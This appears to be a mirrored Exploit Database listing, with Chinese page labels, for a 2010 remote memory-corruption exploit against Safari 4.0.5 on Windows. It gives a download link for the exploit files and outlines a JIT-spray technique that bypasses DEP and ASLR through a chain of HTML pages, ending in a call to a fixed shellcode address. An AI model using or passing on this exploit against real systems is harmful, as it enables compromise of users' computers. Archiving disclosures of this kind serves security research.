Apple Safari 4.0.5 – ‘parent.close()’ Memory Corruption (ASLR + DEP Bypass)

• Exploit Database
• 11 阅读

• 作者： Alexey Sintsov
  日期： 2010-05-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12614/

• Download:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip)
  
  Unzip and run START.htm
  
  This exploit use JIT-SPRAY for DEP and ASLR bypass.
  jit-shellcode: system("notepad")
  
  0day.html - use 0x09090101 address for CALL JITed shellcode.
  
  
  START.htm -> iff.htm -> if1.htm -> 0day.html
  | |
  | |
  JIT-SPRAY parent.close();
  0x09090101 - JITed * ESI=0x09090101
  shellcode * CALL ESI
  
  By Alexey Sintsov
  from
  Digital Security Research Group
  
  [www.dsecrg.com]